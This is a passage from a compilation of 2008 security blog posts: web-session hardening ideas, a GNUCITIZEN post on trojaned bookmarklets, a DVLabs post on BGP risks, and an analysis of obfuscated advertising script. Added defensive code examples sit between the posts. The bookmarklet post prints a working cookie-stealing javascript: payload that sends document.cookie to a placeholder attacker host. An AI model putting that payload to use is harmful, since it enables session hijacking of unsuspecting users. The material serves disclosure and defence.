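    "gif": b"GIF8", "png": b"\x89PNG",
}


def upload_allowed(filename: str, data: bytes) -> bool:
    """Extension allowlist plus magic-byte check. A gifar-style polyglot still
    passes, so treat this as a filter rather than a complete defence."""
    if "." not in filename:
        return False
    ext = filename.rsplit(".", 1)[1].lower()
    magic = UPLOAD_MAGIC.get(ext)
    return magic is not None and data.startswith(magic)


if __name__ == "__main__":
    print(harden_set_cookie("wordpress_logged_in=abc; path=/"))
    print(https_redirect("/wp-login.php", "http", logged_in=False))
    print(rewrite_own_links('<a href="http://blog.example.com/p/1">post</a>'))
    print(upload_allowed("shell.gif", b"<?php"))
```

Each function is the rule in its smallest form; in a real plugin the cookie rewrite would hook the response headers, the redirect would run before any output is sent, and the link rewrite would be applied to the rendered page.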

So how can we fix the Web? I have a few ideas in mind and all of them can be implemented in a plugin. Here they are:

  1. allow the user to sandbox and unsandbox applications and web resources with a single click
  2. sandbox by default known applications such as GMail, Yahoo Mail, etc.
  3. in the sandbox, mark all cookies as secure to prevent session leaks
  4. in the sandbox, mark non-session cookies as httpOnly to prevent session hijacks due to XSS
  5. make sure that while on HTTPS, all embedded resources are delivered over HTTPS as well.
  6. provide the option to turn off JavaScript, Java, Flash, Silverlight, etc. on a per-sandbox basis
  7. block any external requests to sandboxed applications
  8. implement the PHPIDS signature matching mechanism in JavaScript
  9. if the HTML structure is heavily broken, block the page to prevent some types of persistent XSS
  10. record ssl signatures on trusted network and warn if signature changes while on untrusted network

I think that this type of solution will make the Web a lot more secure. It definitely won't fix it, but it will make sidejacking attacks far from easy. It will block the majority of CSRF and XSS attacks. It will provide certain mitigations against persistent XSS attacks. It will provide some mitigations against browser exploits which employ Flash or Java technology to root the browser. It is not perfect, but it looks good enough to me.
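The cookie and URL patches from the WordPress list, and the sandbox's cookie rules from the list just above, as an added example that is not the author's plugin: a response-side hardener in JavaScript that rewrites Set-Cookie headers and same-host links (the header and HTML samples are constructed, and blog.example is a placeholder host).

```javascript
// Added example (not the author's WordPress plugin): response-side hardening
// of the kind the patch lists above describe, written as two pure functions
// so they can sit in a proxy, a server filter, or a browser sandbox.

// Append Secure (and HttpOnly) to a Set-Cookie value when they are missing.
// `scriptReadable` names cookies that page scripts legitimately read; those
// stay reachable from JavaScript and only get Secure. Flags already present
// are kept once; the comparison is case-insensitive, as in browsers' parsing.
function hardenSetCookie(header, scriptReadable = new Set()) {
  const parts = header.split(';').map((p) => p.trim()).filter((p) => p.length > 0);
  if (parts.length === 0) return header;
  const name = parts[0].split('=')[0].trim();
  const attrs = parts.slice(1);
  const present = new Set(attrs.map((a) => a.split('=')[0].trim().toLowerCase()));
  if (!present.has('secure')) attrs.push('Secure');
  if (!present.has('httponly') && !scriptReadable.has(name)) attrs.push('HttpOnly');
  return [parts[0], ...attrs].join('; ');
}

// Rewrite http:// references to our own host inside href/src/action
// attributes to https://, so a page served over HTTPS never pulls or links
// to a plain-HTTP copy of its own content (patches 4 and 5). Other hosts,
// and longer look-alike hosts such as blog.example.org, are left untouched.
function rewriteOwnLinksToHttps(html, ownHost) {
  const escaped = ownHost.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  const re = new RegExp(
    '((?:href|src|action)\\s*=\\s*["\']?)http://(' + escaped + ')(?=[/"\'\\s>?#]|$)',
    'gi',
  );
  return html.replace(re, '$1https://$2');
}

// Constructed sample response pieces (blog.example is a placeholder host).
const SAMPLE_HEADERS = [
  'wordpress_logged_in_abc=user%7C123; path=/',
  'sid=1; secure; HttpOnly',
];
const SAMPLE_HTML =
  '<a href="http://blog.example/p/1">x</a><img src="http://cdn.other/i.png">';

if (typeof require !== 'undefined' && require.main === module) {
  for (const h of SAMPLE_HEADERS) console.log(hardenSetCookie(h));
  console.log(rewriteOwnLinksToHttps(SAMPLE_HTML, 'blog.example'));
}
```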

Next stop: fixing the browser!


August 30, 2008

Bookmarklet of death: Domain hijacking without 0days - Blogs - GNUCITIZEN

So we all know about cross-domain vulnerabilities that allow attackers to run code within the security context of the target domain. Typically, they are either an XSS bug in the server-side application or a bug in the client (a web browser plugin or the web browser itself). Most of the time, these vulnerabilities require some type of interaction from the victim user, e.g. being tricked into clicking on a link or visiting a malicious page.

Now, most techies are familiar with bookmarklets. Well, what’s funny is that many users with knowledge of security - including many infosec professionals - are not aware of the security implications of running a bookmarklet.

The two most common ways to run a bookmarklet are:

  • pasting the JavaScript code - which must start with a javascript: statement - into the address bar and pressing ENTER
  • clicking on the bookmarklet under the ‘Bookmarks’ menu (it must have been previously added)

On one hand, a bookmarklet is a piece of JavaScript that allows you to do something cool with the current webpage. On the other hand, from a security point of view, a bookmarklet is scripting code injection within the security context of the current domain/site by design.

Or, to put it another way: you’ve got the equivalent of an XSS vulnerability in the target site or a cross-domain vulnerability in the web browser. Except that you don’t need to discover a new vulnerability. No 0days required! So, as with cross-domain vulnerabilities, we can inject payloads that allow us to:

  • steal cookies (session hijacking)
  • scrape pages containing interesting data and submit it to the attacker’s site
  • steal usernames and passwords that are autocompleted by the browser
  • perform advanced phishing attacks, e.g. by overwriting the login form’s action attribute or injecting a new fake login form
  • etc …

Also, as with cross-domain vulnerabilities, there is some level of user interaction required: in this case, the attacker must trick the victim into running a bookmarklet while on the target site.

So how can we increase the chance of the victim being tricked into running a bookmarklet? Well, a nice trick is to use a fun and flashy bookmarklet, such as one that reads the images of the current page and creates an animation with them. You could of course write the code from scratch, but we won’t do that as we’re too lazy, aren’t we? Instead, we’ll trojan a publicly available (fun and flashy) bookmarklet with our malicious code. In this case, our malicious payload steals the victim’s cookie for the purpose of hijacking his/her session. Notice that the cookies would be sent to x.php, which the attacker would need to host on his/her site. This PHP script sends any received data (the cookie in this case) to the attacker’s email:


javascript:/*%20start%20of%20evil%20code*/(function(){c=document.createElement("img");c.src="http://evil.domain.foo/x.php?"+document.cookie;c.width=0;c.height=0;document.body.appendChild(c)})();/*end%20of%20evil%20code%20*/window.scrollTo(0,%200);%20R=0;%20x1=.1;%20y1=.05;%20x2=.25;%20y2=.24;%20x3=1.6;%20y3=.24;%20x4=300;%20y4=200;%20x5=300;%20y5=200;%20DI=document.getElementsByTagName('img');%20DIL=DI.length;%20function%20A(){for(i=0;%20i-DIL;%20i++){DIS=DI[%20i%20].style;%20DIS.position='absolute';%20DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+'px';%20DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+'px'}R++}setInterval('A()',5);%20void(0);

Notice that the malicious payload is marked off by JS comments. There is nothing special about the evil code. It simply creates an image tag, which results in the victim’s cookie being sent to a third-party site in the background. The non-malicious payload will also execute, which results in the images of the current page moving around the screen. It’s quite neat, as the user won’t notice that anything suspicious actually happened. Needless to say, you need to replace evil.domain.foo with the site hosting the x.php script.

You can picture this kind of attack actually happening on sites with cross-user functionality, e.g. social networking sites such as Facebook, MySpace and so on…

Thinking about the dangers of running a bookmarklet brings us to the next question:

Why in the world do browsers NOT show a warning before running a bookmarklet?

After all, browsers do display warnings for other potentially dangerous actions such as:

  • visiting a site with an invalid SSL certificate
  • clicking on a form that submits data in clear

I do understand that it would be annoying to warn users every time they run a bookmarklet, but I think it would be sensible to show a warning at least the first time a given bookmarklet is executed. If you work for a popular web browser vendor such as Microsoft or Mozilla, you can think of this as my wish for the day! I’d love to hear your feedback if you are reading this!
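An added example, not from the post: the pre-run audit a browser could perform before a bookmarklet's first execution, decoding the javascript: URL and reporting any sensitive API use combined with a host other than the one the user is on (the two sample bookmarklets and the host names collector.example and social.example are constructed).

```javascript
// Added example, not from the post: the pre-run audit a browser could perform
// the first time a bookmarklet is executed. It decodes the javascript: URL,
// lists every host the code names and every sensitive API it touches, and
// flags the combination the trojaned bookmarklet above relies on: sensitive
// data read plus a host other than the site you are on.

// Sensitive capabilities a bookmarklet may use, with a plain-language label.
const SENSITIVE_ACCESS = [
  [/document\.cookie/, 'reads cookies'],
  [/localStorage|sessionStorage/, 'reads web storage'],
  [/\.value\b/, 'reads form field values'],
  [/\.action\s*=/, 'changes where a form submits'],
  [/XMLHttpRequest|\bfetch\s*\(/, 'makes background requests'],
];

// Decode the URL the way the address bar does. Only /* */ comments are
// removed: a bare // comment cannot be stripped safely, because the // in an
// http:// string literal would be eaten with it.
function decodeBookmarklet(url) {
  if (!/^javascript:/i.test(url)) throw new Error('not a javascript: URL');
  let code = url.slice('javascript:'.length);
  try {
    code = decodeURIComponent(code);
  } catch (e) {
    // malformed percent-encoding: audit the raw text instead
  }
  return code.replace(/\/\*[\s\S]*?\*\//g, ' ');
}

// Audit a bookmarklet against the host it would run on.
function auditBookmarklet(url, currentHost) {
  const code = decodeBookmarklet(url);
  const hosts = new Set();
  const hostRe = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = hostRe.exec(code)) !== null) hosts.add(m[1].toLowerCase());
  const foreignHosts = [...hosts].filter((h) => h !== currentHost.toLowerCase());
  const findings = SENSITIVE_ACCESS.filter(([re]) => re.test(code)).map(([, why]) => why);
  // Sensitive data plus a foreign host is the shape of an exfiltration payload;
  // either on its own is common in harmless bookmarklets.
  const exfiltrationRisk = findings.length > 0 && foreignHosts.length > 0;
  return { hosts: [...hosts], foreignHosts, findings, exfiltrationRisk };
}

// Constructed samples: a cookie-sending bookmarklet of the shape shown in the
// post (collector.example is a placeholder host) and a harmless one.
const SAMPLE_TROJANED =
  'javascript:(function(){var c=document.createElement("img");' +
  'c.src="http://collector.example/x.php?"+document.cookie;' +
  'document.body.appendChild(c)})();/*%20scroll%20to%20top%20*/window.scrollTo(0,%200);void(0);';
const SAMPLE_HARMLESS = 'javascript:void(window.scrollTo(0,%200));';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditBookmarklet(SAMPLE_TROJANED, 'social.example')));
  console.log(JSON.stringify(auditBookmarklet(SAMPLE_HARMLESS, 'social.example')));
}
```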


Three Letter Acronyms and the Imminent Death of the Net - Research - DVLabs

Posted by Rob King

Years ago, I was much more heavily involved in the network engineering side of the network world. Don't get me wrong, there's still plenty of groveling through packet captures here at TippingPoint's orbiting HQ, but I used to actually design networks and configure routers and do all of the nuts-and-bolts stuff that makes networks run.

As a result of this, I know a reasonable amount about various low-level network protocols, including the wonderful, critical, byzantine, and obscure Border Gateway Protocol (BGP).

BGP is an example of an Exterior Gateway Protocol (EGP), as opposed to an Interior Gateway Protocol (IGP). There, see? That clears things up.

Seriously, though. The difference between interior and exterior gateway protocols is whether they are designed to maintain routing for nodes within an Autonomous System (AS) or for nodes between ASes.

An Autonomous System is, well, an autonomous system. It is a network that, at the lowest layer of the Internet, is distinct from all other networks. Basically, an autonomous system is supposed to be entirely responsible for traffic within its borders. If you know in what AS your traffic's destination lives, once it hits that AS, it ceases to be anyone's responsibility but theirs to get that traffic properly routed.

Interior gateway protocols are designed to handle routes within ASes. Common protocols include Open Shortest Path First (OSPF), Interior Gateway Routing Protocol (IGRP) and Enhanced Interior Gateway Routing Protocol (EIGRP). These protocols are used to maintain routing tables and figure out the best paths between hosts in one AS - such as between campuses in a large corporation or points of presence in a telecommunications network.

EGPs handle the problem of routing traffic between different ASes. For example, a multi-homed host may be reachable via both Time Warner's network and Sprint's network. That means that the multi-homed host is reachable via two autonomous systems. Which route should be chosen to get there?

ASes use EGPs to advertise the ranges of IP addresses that their autonomous system knows how to route to, and how well they can route traffic to them.

The only EGP currently in use is the Border Gateway Protocol. BGP is considered to be the core routing protocol of the Internet; it maintains all of the routes between all of the networks that, together, comprise the modern Internet. It is therefore very important.

Well, BGP was designed in a simpler time, a time when you felt like you could trust your neighbor. Therefore, security wasn't really its strong point. In fact, its security is a major weak point.

What's the point of all this, you may ask? Well, everyone remembers Dan Kaminsky's ginormous DNS flaw that made the rounds and scared a lot of people. Now, an equally-if-not-worse way of exploiting the design of BGP has surfaced, thanks to Alex Pilosov and Tony Kapela at this year's just-passed DefCon conference.

I'm not going to go into the details of the attack - I don't want to steal their thunder - but I'll go over a bit why this is scary and interesting.

First off, BGP really is everywhere, just like DNS. Unlike DNS, however, it's not ubiquitously understood - a lot of network administrators have never even heard of BGP, and very few people have ever actually administered it. Therefore, a flaw in the design of BGP may not be addressed as quickly as a flaw in DNS. Active attacks against the flaw might not even be noticed by most network engineers.
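An added example, not the DVLabs author's code and not a defence against the specific technique the post withholds: a route-origin monitor that flags announcements of your own prefixes, or more-specific pieces of them, from an origin AS you did not authorise, which is the kind of check that lets an operator notice an attack on BGP's trust model at all (the prefixes are RFC 5737 documentation ranges and the AS numbers are constructed).

```javascript
// Added example, not the author's code: a route-origin monitor for prefixes
// you own. The post withholds the new attack's details, so this is only the
// generic check "who claims to originate my address space", which catches an
// announcement of your prefix (or a more specific piece of it) from an
// unexpected origin AS. Prefixes are RFC 5737 documentation ranges and the
// AS numbers are constructed.

// Network mask for a prefix length; len 0 is special-cased because a 32-bit
// shift in JavaScript is taken modulo 32.
function maskFor(len) {
  return len === 0 ? 0 : (0xffffffff << (32 - len)) >>> 0;
}

// Parse "a.b.c.d/len" into an unsigned 32-bit network number and length.
function parsePrefix(text) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\/(\d{1,2})$/.exec(text);
  if (!m) throw new Error('bad prefix: ' + text);
  const o = m.slice(1, 5).map(Number);
  const len = Number(m[5]);
  if (o.some((x) => x > 255) || len > 32) throw new Error('bad prefix: ' + text);
  const addr = ((o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3]) >>> 0;
  return { addr: (addr & maskFor(len)) >>> 0, len };
}

// True when `inner` is the same as, or a more specific piece of, `outer`.
function isWithin(outer, inner) {
  return inner.len >= outer.len && ((inner.addr & maskFor(outer.len)) >>> 0) === outer.addr;
}

// expected: [{ prefix, origins }], announcements: [{ prefix, asPath }].
// In BGP the origin is the last AS on the AS_PATH; transit ASes earlier in
// the path are not alerted on, only an origin you did not authorise.
function checkAnnouncements(expected, announcements) {
  const owned = expected.map((e) => ({
    prefix: e.prefix, net: parsePrefix(e.prefix), origins: new Set(e.origins),
  }));
  const alerts = [];
  for (const a of announcements) {
    const net = parsePrefix(a.prefix);
    const origin = a.asPath[a.asPath.length - 1];
    for (const o of owned) {
      if (!isWithin(o.net, net) || o.origins.has(origin)) continue;
      const kind = net.len > o.net.len ? 'more-specific of ' : 'unexpected origin for ';
      alerts.push({ prefix: a.prefix, origin, reason: kind + o.prefix });
    }
  }
  return alerts;
}

// Constructed sample: announcements 1 and 2 are legitimate (direct and via a
// transit AS), 3 claims our /24 from another origin, 4 carves out a more
// specific /25 that routers prefer under longest-prefix match, 5 is someone
// else's address space and is none of our business.
const EXPECTED = [{ prefix: '203.0.113.0/24', origins: [64500] }];
const SAMPLE_ANNOUNCEMENTS = [
  { prefix: '203.0.113.0/24', asPath: [64500] },
  { prefix: '203.0.113.0/24', asPath: [64510, 64500] },
  { prefix: '203.0.113.0/24', asPath: [64510, 64505] },
  { prefix: '203.0.113.128/25', asPath: [64505] },
  { prefix: '198.51.100.0/24', asPath: [64505] },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const alert of checkAnnouncements(EXPECTED, SAMPLE_ANNOUNCEMENTS)) console.log(alert);
}
```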

The other thing that makes this interesting is that it's possibly the sign of a true sea change in the way the Internet works. When the Internet first got off of the ground, all of the nodes were more-or-less trusted, and the protocols were designed accordingly. Nowadays, none of the nodes can trust any of the other nodes. The Internet has grown very quickly, but the core protocols have, by necessity, stayed close to their original designs.

The core protocols are going to have to start changing, perhaps more quickly than we're really comfortable with. The Big One - the transition to IPv6 - hasn't happened yet, and it will undoubtedly be the worst shakeup the Internet has undergone since the September That Never Ended. Even after that, though, we're going to have to ferret out all of the older protocols, figure out how to secure them, and then - worst of all - go through the long and arduous process of actually securing them.

As an example, look at DNSSEC: the security extensions for DNS were first publicized in 1997. Still, after 11 years, practically no one has implemented DNSSEC. Certificate-authenticated email transfer is likewise languishing.

All of these efforts failed because as long as one individual in the system is unsecured, the whole thing breaks down. Changing to a completely secure DNS, SMTP, or BGP infrastructure is going to be like the day Sweden switched to driving on the right. It's going to be expensive, it's going to be painful, and it's going to cause some accidents, but in the end, we'll all be better off for it.


August 29, 2008

Friday Squid Blogging: Translucent Squid - Blogs - Schneier On Security

Photos here....


Understanding the security changes in Flash Player 10 beta - WebApp - CGISecurity.com


Another Voting Machine Cartoon - Blogs - Schneier On Security

You know your industry has problems when mainstream comic strips make fun of you....


ThreatLinQ: A Brave New World: Legitimate Script Obfuscation - Research - DVLabs

Posted by Marc Eisenbarth

As a filter writer, I see a blurred line between blocking real attacks and blocking Internet annoyances. For example, today's Internet advertisements often use the same obfuscation tactics as attackers in order to avoid scrubbing by content filtering systems.

I have been doing some research on Peer-To-Peer (P2P) filters and came across something that illustrates this point very nicely: the following trace, sent to a server that is on one of my IP watch lists:

0000  47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 73 5F 77  GET /cgi-bin/s_w
0010  63 5F 63 6F 72 65 76 33 3F 76 3D 6D 26 74 3D 31  c_corev3?v=m&t=1
0020  20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70   HTTP/1.1..Accep
0030  74 3A 20 2A 2F 2A 0D 0A 52 65 66 65 72 65 72 3A  t: */*..Referer:
0040  20 68 74 74 70 3A 2F 2F 67 61 6D 65 73 2E 73 69   http://games.si
0050  6E 61 2E 63 6F 6D 2E 63 6E 2F 69 66 72 61 6D 65  na.com.cn/iframe
0060  2F 32 30 30 38 2D 30 37 2D 30 39 2F 31 31 36 33  /2008-07-09/1163
0070  2E 73 68 74 6D 6C 0D 0A 41 63 63 65 70 74 2D 4C  .shtml..Accept-L
0080  61 6E 67 75 61 67 65 3A 20 7A 68 2D 63 6E 0D 0A  anguage: zh-cn..
0090  55 41 2D 43 50 55 3A 20 78 38 36 0D 0A 41 63 63  UA-CPU: x86..Acc
00A0  65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A  ept-Encoding: gz
00B0  69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 55 73 65  ip, deflate..Use
00C0  72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61  r-Agent: Mozilla
00D0  2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65  /4.0 (compatible
00E0  3B 20 4D 53 49 45 20 37 2E 30 3B 20 57 69 6E 64  ; MSIE 7.0; Wind
00F0  6F 77 73 20 4E 54 20 35 2E 31 3B 20 51 51 44 6F  ows NT 5.1; QQDo
0100  77 6E 6C 6F 61 64 20 31 2E 37 3B 20 54 68 65 57  wnload 1.7; TheW
0110  6F 72 6C 64 29 0D 0A 48 6F 73 74 3A 20 77 6F 6F  orld)..Host: woo
0120  63 61 6C 6C 2E 67 61 6D 65 73 2E 73 69 6E 61 2E  call.games.sina.
0130  63 6F 6D 2E 63 6E 0D 0A 43 6F 6E 6E 65 63 74 69  com.cn..Connecti
0140  6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A  on: Keep-Alive..
0150  43 6F 6F 6B 69 65 3A 20 53 49 4E 41 47 4E 3D 30  Cookie: SINAGN=0
0160  7C 31 32 31 37 36 34 34 37 37 34 32 36 35 3B 20  |1217644774265; 
0170  73 69 6E 61 52 6F 74 61 74 6F 72 2F 3D 32 33 3B  sinaRotator/=23;
0180  20 53 49 4E 41 47 4C 4F 42 41 4C 3D 31 35 32 2E   SINAGLOBAL=152.
0190  32 33 2E 36 31 2E 31 36 33 2E 33 32 31 30 32 31  23.61.163.321021
01A0  32 31 33 37 36 36 32 39 38 33 31 31 3B 20 76 6A  213766298311; vj
01B0  75 69 64 73 3D 35 62 31 34 66 39 38 33 39 2E 31  uids=5b14f9839.1
01C0  31 62 38 30 34 32 61 37 39 66 2E 30 2E 31 62 30  1b8042a79f.0.1b0
01D0  62 64 61 62 61 32 66 33 66 66 63 3B 20 76 6A 6C  bdaba2f3ffc; vjl
01E0  61 73 74 3D 31 32 31 37 36 34 34 37 37 38 3B 20  ast=1217644778; 
01F0  41 70 61 63 68 65 3D 31 35 32 2E 32 33 2E 36 31  Apache=152.23.61
0200  2E 31 36 33 2E 38 36 38 36 31 32 31 37 36 33 30  .163.86861217630
0210  32 33 33 36 37 32 3B 20 53 45 3D 39 43 41 41 36  233672; SE=9CAA6
0220  46 34 33 35 34 30 37 41 42 31 36 32 44 44 37 38  F435407AB162DD78
0230  45 43 37 42 43 45 45 32 37 33 46 37 36 37 37 42  EC7BCEE273F7677B
0240  36 36 44 30 30 35 34 36 36 41 35 41 42 41 32 39  66D005466A5ABA29
0250  39 31 30 42 33 44 34 42 30 35 44 42 32 43 45 33  910B3D4B05DB2CE3
0260  30 46 35 30 37 39 41 44 42 32 34 38 30 30 39 45  0F5079ADB248009E
0270  43 39 43 32 35 30 32 45 33 32 34 46 41 36 46 39  C9C2502E324FA6F9
0280  43 30 34 30 37 42 41 44 34 39 44 32 39 36 46 32  C0407BAD49D296F2
0290  38 39 43 30 36 38 32 42 35 37 38 30 44 42 35 39  89C0682B5780DB59
02A0  43 45 37 45 33 44 43 37 34 30 30 37 33 36 46 35  CE7E3DC7400736F5
02B0  35 45 41 33 37 36 33 31 38 36 34 3B 20 53 43 54  5EA37631864; SCT
02C0  3D 31 31 3B 20 53 41 3D 30 25 37 43 30 25 37 43  =11; SA=0%7C0%7C
02D0  30 25 37 43 30 25 37 43 31 25 37 43 31 25 37 43  0%7C0%7C1%7C1%7C
02E0  31 25 37 43 31 25 37 43 30 25 37 43 31 25 37 43  1%7C1%7C0%7C1%7C
02F0  30 25 37 43 30 25 37 43 31 25 37 43 30 25 37 43  0%7C0%7C1%7C0%7C
0300  30 25 37 43 30 25 37 43 31 25 37 43 30 25 37 43  0%7C0%7C1%7C0%7C
0310  30 25 37 43 30 25 37 43 30 25 37 43 30 25 37 43  0%7C0%7C0%7C0%7C
0320  30 25 37 43 30 25 37 43 30 25 37 43 30 3B 20 50  0%7C0%7C0%7C0; P
0330  53 3D 30 3B 20 53 55 3D 25 45 35 25 41 44 25 39  S=0; SU=%E5%AD%9
0340  39 25 45 39 25 39 44 25 39 36 25 45 34 25 42 38  9%E9%9D%96%E4%B8
0350  25 42 30 3A 32 3A 31 32 37 36 38 33 35 38 32 37  %B0:2:1276835827
0360  3A 66 68 66 79 75 3A 31 32 31 37 36 33 30 32 38  :fhfyu:121763028
0370  34 3A 31 3A 31 39 32 32 2D 30 35 2D 32 36 3A 3B  4:1:1922-05-26:;
0380  20 53 49 4E 41 50 52 4F 3D 66 71 32 6D 66 4D 38   SINAPRO=fq2mfM8
0390  4D 44 25 33 44 37 57 6D 44 78 46 25 32 35 37 25  MD%3D7WmDxF%257%
03A0  32 35 25 32 35 78 32 39 57 39 77 37 25 33 44 52  25%25x29W9w7%3DR
03B0  32 4A 25 32 35 65 78 79 37 4A 25 33 44 32 4D 69  2J%25exy7J%3D2Mi
03C0  52 25 32 36 6C 7A 4D 37 32 77 25 33 44 25 32 35  R%26lzM72w%3D%25
03D0  39 4A 25 32 31 37 6D 77 25 32 35 39 25 32 36 25  9J%217mw%259%26%
03E0  32 36 4D 6D 4A 4D 25 32 31 77 3B 20 55 4E 49 50  26MmJM%21w; UNIP
03F0  52 4F 55 3D 32 3A 25 43 42 25 45 46 25 42 45 25  ROU=2:%CB%EF%BE%
0400  42 38 25 42 37 25 45 31 3A 30 3A 3A 31 3A 3B 20  B8%B7%E1:0::1:; 
0410  6E 69 63 6B 3D 66 68 66 79 75 28 31 32 37 36 38  nick=fhfyu(12768
0420  33 35 38 32 37 29 3B 20 61 70 70 6D 61 73 6B 3D  35827); appmask=
0430  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  00000000
0440  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34  00000004
0450  3B 20 67 65 6E 64 65 72 3D 31 3B 20 53 49 4E 41  ; gender=1; SINA
0460  2D 41 56 41 54 41 52 3D 30 25 37 43 30 25 37 43  -AVATAR=0%7C0%7C
0470  30 25 37 43 30 25 37 43 31 25 37 43 31 25 37 43  0%7C0%7C1%7C1%7C
0480  31 25 37 43 31 25 37 43 30 25 37 43 31 25 37 43  1%7C1%7C0%7C1%7C
0490  30 25 37 43 30 25 37 43 31 25 37 43 30 25 37 43  0%7C0%7C1%7C0%7C
04A0  30 25 37 43 30 25 37 43 31 25 37 43 30 25 37 43  0%7C0%7C1%7C0%7C
04B0  30 25 37 43 30 25 37 43 30 25 37 43 30 25 37 43  0%7C0%7C0%7C0%7C
04C0  30 25 37 43 30 25 37 43 30 25 37 43 30 3B 20 53  0%7C0%7C0%7C0; S
04D0  49 4E 41 50 52 4F 43 3D 31 3B 20 55 4E 49 50 52  INAPROC=1; UNIPR
04E0  4F 54 4D 3D 31 32 31 37 36 33 30 32 38 34 3B 20  OTM=1217630284; 
04F0  53 49 4E 41 5F 4E 55 3D 3B 20 53 49 4E 41 5F 4F  SINA_NU=; SINA_O
0500  55 3D 3B 20 53 49 4E 41 5F 55 53 45 52 3D 3B 20  U=; SINA_USER=; 
0510  53 4D 53 5F 43 4F 4F 4B 49 45 3D 3B 20 53 49 44  SMS_COOKIE=; SID
0520  3D 3B 20 55 4E 49 50 52 4F 4D 3D 3B 20 67 5F 78  =; UNIPROM=; g_x
0530  5F 64 5F 6A 5F 73 3D 37 64 38 7C 37 7C 31 3B 20  _d_j_s=7d8|7|1; 
0540  73 69 6E 61 52 6F 74 61 74 6F 72 2F 3D 32 33 0D  sinaRotator/=23.
0550  0A 0D 0A                                           ...

This seemed strange, so I pulled down the source from the above cgi-bin and found this:

function Bgfhp(){
  var S_WC_EMBED_CORE=function(){this.Init.apply(this,arguments);};
  S_WC_EMBED_CORE.prototype={
    bY:false,
    Init:function(bY,cl){this.cl=cl;this.bY=bY;this.bX=this.Z();if(this.bX){this.ag();}else S_WC_EMBED_CORE=null;},
    Z:function(){var aC=/http:\/\/([A-Za-z0-9\-\.]+)(.sina.com.cn)\//ig;var ci=document.location.href;var bo=ci.indexOf('?');if(bo!=-1)ci=ci.substr(0,bo);var bp=ci.indexOf('#');if(bp!=-1)ci=ci.substr(0,bp);if(!aC.test(ci)){return false;}return true;},
    ag:function(){var ak=new Util.aO;this.bY=ak.am(this.bY,this.cl.P,true);window.document.woocall_swf_file.SetVariable("Probe",this.bY);}
  };
  var WCEmbedCore = new S_WC_EMBED_CORE('999e69a3b8e9231ea48de6f141d1d3c7fdd567a5',S_WC.EmbedConf);
}
Bgfhp();

This looks more like bad programming than anything, so I decided to check out the HTTP Referer, and I was directed to a Flash application:

A backdoor, perhaps? Let's look at the source code that creates this little gem:

<!--[442,2,9] published at 2007-08-13 11:19:29 from #237 by 1786-->
if(typeof Util=='undefined')Util={};Util.aO=function()
{this.Init.apply(this,arguments);};Util.aO.prototype={Init:function
(){},au:function(v,w){var bs=v.length;var aK=v[bs-1]&0xffffffff;for
(var i=0;i<bs;i++){v[i]=String.fromCharCode(v[i]&0xff,v[i]
>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}if(w){return v.join
('').substring(0,aK);}else{return v.join('');}},bq:function(s,w){var
 ce=s.length;var v=[];for(var i=0;i<ce;i+=4){v[i>>2]=s.charCodeAt
(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)
<<24;}if(w){v[v.length]=ce;}return v;},am:function(cg,at,as){if
(cg==""){return "";}if(as)cg=this.aq(cg);var v=this.bq(cg,false);var
 k=this.bq(at,false);var n=v.length-1;var z=v[n-1],y=v
[0],bh=0x9E3779B9;var bU,e,q=Math.floor(6+52/
(n+1)),cc=q*bh&0xffffffff;while(cc!=0){e=cc>>>2&3;for(var p=n;p>0;p
--){z=v[p-1];bU=(z>>>5^y<<2)+(y>>>3^z<<4)^(cc^y)+(k[p&3^e]^z);y=v
[p]=v[p]-bU&0xffffffff;}z=v[n];bU=(z>>>5^y<<2)+(y>>>3^z<<4)^(cc^y)+
(k[p&3^e]^z);y=v[0]=v[0]-bU&0xffffffff;cc=cc-bh&0xffffffff;}return 
this.au(v,true);},aq:function(h){var r="";for(var i=(h.substr(0,2)
=="0x")?2:0;i<h.length;i+=2)r+=String.fromCharCode(parseInt
(h.substr(i,2),16));return r;}};if(typeof Util=='undefined')Util=
{};Util.by=function(){this.Init.apply
(this,arguments);};Util.by.prototype={ar:0,o:"",cb:8,Init:function
(){},bi:function(s){return this.ah(this.aj(this.aL
(s),s.length*this.cb));},aj:function(x,ce){x[ce>>5]|=0x80<<(24-ce%
32);x[((ce+64>>9)<<4)+15]=ce;var w=Array(80);var a=1732584193;var 
b=-271733879;var c=-1732584194;var d=271733878;var e=-
1009589776;for(var i=0;i<x.length;i+=16){var ax=a;var ay=b;var 
az=c;var aA=d;var aB=e;for(var j=0;j<80;j++){if(j<16)w[j]=x
[i+j];else w[j]=this.bH(w[j-3]^w[j-8]^w[j-14]^w[j-16],1);var 
t=this.cf(this.cf(this.bH(a,5),this.aI(j,b,c,d)),this.cf(this.cf
(e,w[j]),this.aJ(j)));e=d;d=c;c=this.bH(b,30);b=a;a=t;}a=this.cf
(a,ax);b=this.cf(b,ay);c=this.cf(c,az);d=this.cf(d,aA);e=this.cf
(e,aB);}return Array(a,b,c,d,e);},aI:function(t,b,c,d){if(t<20)
return(b&c)|((~b)&d);if(t<40)return b^c^d;if(t<60)return(b&c)|(b&d)
|(c&d);return b^c^d;},aJ:function(t){return(t<20)?1518500249:
(t<40)?1859775393:(t<60)?-1894007588:-899497514;},cf:function(x,y)
{var bl=(x&0xFFFF)+(y&0xFFFF);var aw=(x>>16)+(y>>16)+
(bl>>16);return(aw<<16)|(bl&0xFFFF);},bH:function(bm,bg){return
(bm<<bg)|(bm>>>(32-bg));},aL:function(cg){var aX=Array();var av=
